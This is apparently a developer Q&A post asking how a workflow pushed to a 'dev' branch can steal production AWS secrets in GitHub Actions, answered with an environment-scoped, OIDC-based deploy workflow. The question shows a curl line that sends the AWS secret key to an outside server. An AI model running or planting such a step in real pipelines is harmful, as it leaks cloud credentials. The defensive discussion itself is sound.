I may be missing something about GitHub Actions in production, because it seems that if a developer can commit to some branch of the repository, they can obtain production keys that are stored as GitHub secrets.
Let's say I have two branches "dev" and "prod".
After a push to the prod branch, I have a GitHub Action (deploy.workflow) which deploys my updates to AWS. The credentials (AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY) used in the GitHub Action are stored as GitHub repository Secrets. All good for now.
Let's say we have a developer without access to the prod branch. This developer can now create a new GitHub Action, push it to the "dev" branch and expose the secret keys!
The action would look something like this:
on:
  push:
    branches: [ dev ]
jobs:
  expose:
    ....
      - name: Expose secrets
        run: curl myserver/key/${{ secrets.AWS_SECRET_ACCESS_KEY }}
Looking at the logs of the action a developer will be able to find production keys!
Is there any way to protect against this?
EDIT: Turns out secrets are filtered out of the logs, but it's still possible to obtain them by sending them to your own server using curl. (code updated)
curl myserver/key/${{ secrets.AWS_SECRET_ACCESS_KEY }}
- Markon
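The usual way to close this gap is to stop storing the production credentials as repository-level secrets and scope them to a GitHub Environment whose deployment-branch rule only admits the prod branch, optionally replacing the long-lived keys with OIDC. The following deploy workflow is an added example, not code from the question; the environment name, role ARN, region and deploy script are placeholders.

```yaml
# Added example: a deploy workflow whose AWS credentials are only reachable
# from the "prod" branch. Assumes a GitHub Environment named "production"
# exists (repository settings -> Environments) with a deployment-branch rule
# allowing only "prod", and that AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY were
# moved out of the repository secrets into that environment's secrets.
name: deploy
on:
  push:
    branches: [ prod ]

permissions:
  contents: read
  id-token: write   # only needed for the OIDC variant (B) below

jobs:
  deploy:
    runs-on: ubuntu-latest
    # A job that does not declare this environment (e.g. one added on "dev")
    # never receives the environment's secrets, and a job that declares it
    # from a branch outside the deployment-branch rule is rejected before it
    # starts, so a workflow pushed to "dev" cannot read the production keys.
    environment: production
    steps:
      - uses: actions/checkout@v4

      # Variant A: keep the long-lived keys, but now environment-scoped.
      - name: Configure AWS credentials (environment secrets)
        uses: aws-actions/configure-aws-credentials@v4
        with:
          aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
          aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          aws-region: us-east-1   # placeholder

      # Variant B (preferred): no stored key at all. The IAM role's trust
      # policy limits the OIDC "sub" claim to
      #   repo:ORG/REPO:environment:production
      # so only jobs running under this environment can assume the role.
      # - name: Configure AWS credentials (OIDC)
      #   uses: aws-actions/configure-aws-credentials@v4
      #   with:
      #     role-to-assume: arn:aws:iam::123456789012:role/github-deploy  # placeholder
      #     aws-region: us-east-1

      - name: Deploy
        run: ./deploy.sh   # placeholder for the actual deployment step
```

Environment secrets still appear in the job's context only for jobs that pass the environment's protection rules, so required reviewers on the same environment add a human approval step in front of every use of the keys.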